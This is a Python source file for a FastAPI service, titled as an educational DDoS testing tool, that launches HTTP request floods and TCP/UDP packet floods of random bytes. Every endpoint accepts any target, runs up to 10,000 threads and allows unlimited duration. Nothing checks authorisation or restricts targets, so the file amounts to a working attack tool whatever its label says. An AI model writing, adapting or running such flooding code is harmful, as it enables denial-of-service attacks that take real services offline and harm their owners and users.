| |
| import uvicorn |
| from fastapi import FastAPI, HTTPException |
| from pydantic import BaseModel, conint, constr |
| import threading |
| import requests |
| import time |
| import logging |
| import socket |
| import random |
| from concurrent.futures import ThreadPoolExecutor |
|
|
| logging.basicConfig(level=logging.INFO) |
| logger = logging.getLogger(__name__) |
|
|
| app = FastAPI(title="DDoS Testing Tool (Educational Only)") |
|
|
| |
| attack_active = False |
| attack_thread = None |
| executor = ThreadPoolExecutor(max_workers=10000) |
|
|
| class Layer7Config(BaseModel): |
| target: str |
| port: int = 80 |
| duration: int = 30 |
| threads: int = 100 |
|
|
| class Layer4Config(BaseModel): |
| target: str |
| port: int = 80 |
| duration: int = 30 |
| threads: int = 100 |
| protocol: constr(regex='^(tcp|udp)$') = "tcp" |
| payload_size: int = 1024 |
|
|
| def generate_payload(size: int) -> bytes: |
| """Generate random payload for Layer 4 attacks""" |
| return bytes(random.getrandbits(8) for _ in range(size)) |
|
|
| def layer7_attack(target_url: str): |
| headers = { |
| "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36", |
| "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", |
| "Connection": "keep-alive", |
| "Cache-Control": "no-cache", |
| "Pragma": "no-cache" |
| } |
| session = requests.Session() |
| while attack_active: |
| try: |
| session.get(target_url, headers=headers, timeout=5, verify=False) |
| except: |
| pass |
|
|
| def layer4_attack(target_ip: str, port: int, protocol: str, payload_size: int): |
| sock = None |
| try: |
| if protocol == "tcp": |
| sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) |
| sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) |
| sock.connect((target_ip, port)) |
| else: |
| sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) |
|
|
| while attack_active: |
| payload = generate_payload(payload_size) |
| if protocol == "tcp": |
| sock.send(payload) |
| else: |
| sock.sendto(payload, (target_ip, port)) |
| time.sleep(0.01) |
| except Exception as e: |
| logger.error(f"Layer 4 attack error: {e}") |
| finally: |
| if sock: |
| sock.close() |
|
|
| def start_layer7_attack(config: Layer7Config): |
| global attack_active |
| attack_active = True |
|
|
| |
| thread_count = config.threads if config.threads != -1 else 10000 |
|
|
| |
| protocol = "https" if config.target.startswith("https") else "http" |
| target_url = f"{config.target}:{config.port}" |
| logger.info(f"Starting Layer 7 attack on {target_url} with {thread_count} threads") |
|
|
| for _ in range(thread_count): |
| executor.submit(layer7_attack, target_url) |
|
|
| |
| if config.duration != -1: |
| time.sleep(config.duration) |
| stop_attack() |
| else: |
| logger.info("Layer 7 attack running indefinitely until manually stopped") |
|
|
| def start_layer4_attack(config: Layer4Config): |
| global attack_active |
| attack_active = True |
|
|
| |
| thread_count = config.threads if config.threads != -1 else 10000 |
|
|
| |
| try: |
| target_ip = socket.gethostbyname(config.target.split("//")[-1].split("/")[0]) |
| except: |
| raise HTTPException(status_code=400, detail="Invalid target URL") |
|
|
| logger.info(f"Starting {config.protocol.upper()} attack on {target_ip}:{config.port} with {thread_count} threads") |
|
|
| for _ in range(thread_count): |
| executor.submit(layer4_attack, target_ip, config.port, config.protocol, config.payload_size) |
|
|
| |
| if config.duration != -1: |
| time.sleep(config.duration) |
| stop_attack() |
| else: |
| logger.info(f"{config.protocol.upper()} attack running indefinitely until manually stopped") |
|
|
| def stop_attack(): |
| global attack_active |
| attack_active = False |
| logger.info("Attack stopped.") |
|
|
| @app.post("/layer7/attack") |
| def launch_layer7_attack(config: Layer7Config): |
| global attack_thread |
| if attack_thread and attack_thread.is_alive(): |
| raise HTTPException(status_code=400, detail="Attack already in progress") |
|
|
| |
| if config.threads != -1 and config.threads > 10000: |
| raise HTTPException(status_code=400, detail="Max 10,000 threads allowed (use -1 for unlimited)") |
|
|
| |
| if config.duration != -1 and config.duration > 5000: |
| raise HTTPException(status_code=400, detail="Max duration 5000 seconds (use -1 for unlimited)") |
|
|
| attack_thread = threading.Thread(target=start_layer7_attack, args=(config,), daemon=True) |
| attack_thread.start() |
| return {"status": "layer7_attack_started", "config": config} |
|
|
| @app.post("/layer4/attack") |
| def launch_layer4_attack(config: Layer4Config): |
| global attack_thread |
| if attack_thread and attack_thread.is_alive(): |
| raise HTTPException(status_code=400, detail="Attack already in progress") |
|
|
| |
| if config.threads != -1 and config.threads > 10000: |
| raise HTTPException(status_code=400, detail="Max 10,000 threads allowed (use -1 for unlimited)") |
|
|
| |
| if config.duration != -1 and config.duration > 5000: |
| raise HTTPException(status_code=400, detail="Max duration 5000 seconds (use -1 for unlimited)") |
|
|
| |
| if config.payload_size > 65507: |
| raise HTTPException(status_code=400, detail="Max payload size is 65507 bytes") |
|
|
| attack_thread = threading.Thread(target=start_layer4_attack, args=(config,), daemon=True) |
| attack_thread.start() |
| return {"status": f"{config.protocol}_attack_started", "config": config} |
|
|
| @app.post("/stop") |
| def stop(): |
| stop_attack() |
| return {"status": "attack_stopped"} |
|
|
| @app.get("/status") |
| def status(): |
| return {"attack_active": attack_active} |
|
|
| if __name__ == "__main__": |
| uvicorn.run(app, host="0.0.0.0", port=8000) |
|
|